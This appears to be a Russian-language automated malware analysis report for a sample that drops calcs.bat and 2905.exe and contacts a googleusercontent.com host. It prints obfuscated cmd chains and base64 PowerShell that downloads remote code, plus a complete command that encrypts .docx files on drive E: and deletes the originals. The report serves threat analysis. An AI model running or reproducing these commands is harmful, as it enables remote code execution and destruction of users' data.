Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cmd /V:O/C "set 8ic=AsDAwAQUAYEAkAAIA0GAlBAdAkEAtAQZAsGAvBgdA4GAJBwOAcCA2AANAUDAtBAbAgHAnAQPAgDAyAgMAIGAtBwYAQCA7AQKAEDARBgRAQCAgAALA0FAxAwWAcHAhBgeAQCAoAQZAwGApBgRAQGAhBwbAwGAuBwdA8GAEBgLAk...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\calcs.bat
- C:\users\public\2905.exe
Сетевая активность
Подключается к
- 'do#########ocs.googleusercontent.com':443
TCP
Другие
- 'do#########ocs.googleusercontent.com':443
UDP
- DNS ASK do#########ocs.googleusercontent.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C "set 8ic=AsDAwAQUAYEAkAAIA0GAlBAdAkEAtAQZAsGAvBgdA4GAJBwOAcCA2AANAUDAtBAbAgHAnAQPAgDAyAgMAIGAtBwYAQCA7AQKAEDARBgRAQCAgAALA0FAxAwWAcHAhBgeAQCAoAQZAwGApBgRAQGAhBwbAwGAuBwdA8GAEBgLAkCA2BgYA...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo %Public:~9,1%%ProgramData:~5,1%w%Public:~5,1%%Public:~6,1%%Public:~7,1%h%Public:~5,1%%Public:~12,1%%Public:~12,1% -e JAB4AGwAbQA1ADQANgA9ACcAYwBtAGIAMgAyADgAJwA7ACQAagBiAHYAPQBO...
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGwAbQA1ADQANgA9ACcAYwBtAGIAMgAyADgAJwA7ACQAagBiAHYAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAegBhAHcAPQAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAG...
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\calcs.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAYwBkACAALwBkACAARQA6AFwAIAAmACYAIABmAG8AcgAgAC8AZgAgACUAYQAgAGkAbgAgACgAJwBkAGkAcgAgAC8AcwAgAC8AYgAgACoALgBkAG8AYwB4ACcAKQAgAGQAbwAgAGUAYwBoAG8AIAAlAH4AZgBhAC...
- '<SYSTEM32>\cmd.exe' /c "cd /d E:\ && for /f %a in ('dir /s /b *.docx') do echo %~fa && C:\Users\Public\2905.exe %~fa E:%~pa%~na.encrypt 29052022 && del %~fa"
